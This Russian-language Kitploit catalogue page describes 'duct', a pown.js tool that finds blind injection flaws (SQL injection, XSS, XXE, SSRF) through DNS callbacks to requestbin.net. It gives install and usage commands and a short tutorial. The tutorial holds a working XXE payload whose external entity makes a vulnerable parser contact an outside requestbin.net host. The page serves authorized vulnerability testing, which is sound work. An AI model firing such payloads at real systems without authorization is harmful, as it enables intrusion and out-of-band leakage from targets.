Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
duct — Необходимый инструмент для поиска слепых инъекционных атак. | Kitploit
Инструменты/GitHubGitHub/pownjs/duct
Эксплуатация веб-приложенийСбор информацииАнализ DNS
GitHubpownjs/duct

duct

Необходимый инструмент для поиска слепых инъекционных атак.

Репозиторий
49137 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Follow on Twitter NPM Fury

Pown Duct

Основное средство для обнаружения слепых инъекционных атак с использованием DNS-сайд-каналов.

Благодарности

Этот инструмент является частью инициативы с открытым исходным кодом secapps.com.

root@kitploit:~
  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: Этот инструмент использует преимущества сервиса http://requestbin.net. В будущих версиях будет использоваться специальная, собранная по индивидуальному заказу инфраструктура.

Быстрый старт

Этот инструмент предназначен для использования в составе Pown.js, но его можно вызывать отдельно как самостоятельный инструмент.

Установите Pown как обычно:

root@kitploit:~
$ npm install -g pown@latest

Запустите напрямую из Pown:

root@kitploit:~
$ pown duct

Или установите этот модуль локально из корня вашего проекта:

root@kitploit:~
$ npm install @pown/duct --save

После этого запустите cli pown:

root@kitploit:~
$ ./node_modules/.bin/pown-cli duct

Вы также можете использовать глобальный pown для локального вызова инструмента:

root@kitploit:~
$ POWN_ROOT=. pown duct

Использование

root@kitploit:~
pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

root@kitploit:~
pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Учебное пособие

Бывают случаи, когда нам необходимо выполнить атаку, такую как SQL-инъекция, XSS, XXE или SSRF, но целевое приложение не дает никаких признаков уязвимости. Один из способов убедиться в наличии уязвимости — попытаться внедрить допустимый вектор атаки, который заставляет DNS-резольвер запрашивать управляемый домен. Если разрешение прошло успешно, атака считается успешной.

ПРИМЕЧАНИЕ: Возможно, вы знакомы с Burp Collaborator, который предоставляет аналогичный сервис для клиентов.

Во-первых, нам нужно одноразовое DNS-имя для разрешения:

root@kitploit:~
$ pown duct dns

screenshot

Используя предоставленный DNS, составьте свою нагрузку. Например, следующий код может вызвать разрешение DNS, если присутствует уязвимость XXE.

root@kitploit:~
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>

Если атака прошла успешно, мы получим сообщение в терминале.

screenshot

Скачать инструмент